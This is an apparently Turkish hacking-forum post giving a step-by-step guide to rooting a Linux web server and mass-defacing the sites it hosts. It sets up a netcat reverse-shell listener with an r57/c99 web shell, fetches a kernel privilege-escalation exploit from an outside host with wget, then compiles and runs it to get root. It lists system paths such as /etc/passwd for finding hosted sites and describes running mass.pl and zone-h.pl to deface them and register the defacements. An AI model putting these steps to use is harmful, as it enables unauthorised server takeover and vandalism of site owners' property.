Server Rooting (1 Viewer)

I

Isko~

##########################################


Merhaba Arkadaslar

malzemeler:
1) netcat (for back connect)
2) r57 yada c99 shell (Back connect opsinoyu bazi c99larda da mevcuttur)
3) mass.pl (çoklu deface için indexleyicidir)
4) zone-h.pl (çoklu deface kaydi içindir)
5) bir adet index

Baslayalim baslat çalistira cmd yazip tamam diyoruz
karsimiza siyah ms-dos ekrani gelecek bu ekrana
nc -v -l -p 443 yazalim (ben 443 dedim sizde hangi port açiksa artik) enterliyalim
Ufak bi not: (bazen sizin portunuz açik olabilir ama serverin o portu açik olmayabilir
açik server portunu Nmap - Zenmap GUI programi bize soyluyor. bununla tarayabilirniz)
evet ornek olarak r57 shellimizde de back connect yerine 443 yaziyoruz

shellimizde de bu yazi çiktiktan sonra dos ekranina donelim baglandikmi bakalim



evet baglandik serverimiz 2007 sürümü 2.6.22

exploitimizi googledan veya milw0rm dan arayip bulduktan sonra

serverin yazma silme izni olan bi klasorune atiyoruz genelde tmp ye atilir tmp dizinleri iki kisimdir birisi dizin olarak /tmp dizinindedir digeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdigim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.22.c
exploitlerin uzantisi c dir c diliyle yazildiklarindan dolayi
not: bazi serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attigimiz exploiti derleyecegiz simdi ( derleme isleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdimiz yere istediginizi yazabilirsiniz)
chmod ayari yapacagiz
chmod 777 root dedikten sonra explotimizi çagirmaya geldi sira
./root diyerek exploitimizi çagiriyoruz

bazen hemen bazen bi süre bekledikten sonra cevap gelir sabirli olun
id komutuyla kontrol edelim

evet serverimiz rootlandi
whoami komutuylada bu görüyoruz (verdigimiz isim çikmalidir)
uid=0 i gorduk
simdi musait bi yere indeximizi ve mass.pl yi atalim
serverdakileri siteleri gormek içinse çok çesitli yollarimiz mevcuttur
bu komutlar :
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/
cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla siralayip gorebiliriz yada izinler açiksa shellden o dizine gecebiliriz

siteleri bulup bilgisayarimizda C:/Perl/bin/ klasorunun içine hack.txt diyer kayit edin.(bilgilsayarinizda perl Programi yuklu olmalidir)
kayit ettikten sonra dos ekraninda mass deface islemine gecelim


önce ekrana perl mas.pl yazip nasil çalistiginiz kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example i veriyor)
mass deface biraz zaman alabilir sabirli olmak gerek
islem bitince all homepages defaced diye bi yazi gelecek bu yazidan sonra yine baslat çalistir cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Isko~ (nickimi yazdim) yazip enter diyoruz



olay budur arkadaslar anlayamayan yada takilan olursa yazsin cevaplariz

Selametle
 

Users who are viewing this thread

Top